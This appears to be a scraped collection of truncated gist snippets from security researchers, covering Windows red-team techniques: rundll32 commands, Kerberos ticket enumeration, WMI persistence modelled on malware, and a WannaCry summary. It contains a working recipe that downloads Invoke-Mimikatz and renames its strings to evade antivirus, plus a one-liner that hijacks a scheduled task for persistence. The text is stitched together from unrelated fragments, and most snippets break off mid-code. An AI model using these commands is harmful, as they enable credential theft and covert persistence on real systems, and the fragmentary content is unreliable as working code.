brettmillerb

DisplayName                          Twitterhandle   
-----------                          -------------   
fr016                                @fr0161         
chgopsug                             @chgopsug       
Kevin Bates                          @_bateskevin    
Danny Maertens                       @maertend33     
Julien Reisdorffer                   @JReisdorffer   
Ben Reader                           @powers_hell    

NaniteFactory

package main

//#include "dllmain.h"
import "C"

scotgabriel

Rundll32 commands

OS: Windows 10/8/7

Add/Remove Programs

• RunDll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,0

Content Advisor

• RunDll32.exe msrating.dll,RatingSetupUI

Control Panel

jaredcatkinson

function Get-KerberosTicketGrantingTicket
{
    <#
    .SYNOPSIS

    Gets the Kerberos Tickets Granting Tickets from all Logon Sessions

    .DESCRIPTION

    Get-KerberosTicketGrantingTicket uses the Local Security Authority (LSA) functions to enumerate Kerberos logon sessions and return their associate Kerberos Ticket Granting Tickets.

mgeeky

'
' SYNOPSIS:
' 	WMI Persistence method as originally presented by SEADADDY malware
'		(https://github.com/pan-unit42/iocs/blob/master/seaduke/decompiled.py#L887)
' 	and further documented by Matt Graeber.
'
' 	The scheduled command will be launched after roughly 3 minutes since system 
' 	gets up. Also, even if the command shall spawn a window - it will not be visible,
' 	since the command will get invoked by WmiPrvSE.exe that's running in Session 0.
'

jaredhaight

Resources

Malware examples

• Fireeye HammerToss PDF: https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf
• 7 Years of Dukes: https://labsblog.f-secure.com/2015/09/17/the-dukes-7-years-of-russian-cyber-espionage/
• RTM Banking malware: https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf
• Lowball Malware: https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html
• CloudAtlas malware: https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/

Security Tools and Resources

PaulSec

# AV Bypass to run Mimikatz
# From: https://www.blackhillsinfosec.com/?p=5555

# Server side:
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1
sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1
sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1
sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1
sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1

mubix

Get-ScheduledTask -TaskName 'XblGameSaveTaskLogon' | % { $_.Actions += New-ScheduledTaskAction -Execute 'calc.exe'; Set-ScheduledTask -TaskPath $_.TaskPath -TaskName $_.TaskName -Action $_.Actions }

rain-1

WannaCry|WannaDecrypt0r NSA-Cyberweapon-Powered Ransomware Worm

• Virus Name: WannaCrypt, WannaCry, WanaCrypt0r, WCrypt, WCRY
• Vector: All Windows versions before Windows 10 are vulnerable if not patched for MS-17-010. It uses EternalBlue MS17-010 to propagate.
• Ransom: between $300 to $600. There is code to 'rm' (delete) files in the virus. Seems to reset if the virus crashes.
• Backdooring: The worm loops through every RDP session on a system to run the ransomware as that user. It also installs the DOUBLEPULSAR backdoor. It corrupts shadow volumes to make recovery harder. (source: malwarebytes)
• Kill switch: If the website www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com is up the virus exits instead of infecting the host. (source: malwarebytes). This domain has been sinkholed, stopping the spread of the worm. Will not work if proxied (source).

update: A minor variant of the viru

nicholasmckinney

using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;

/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause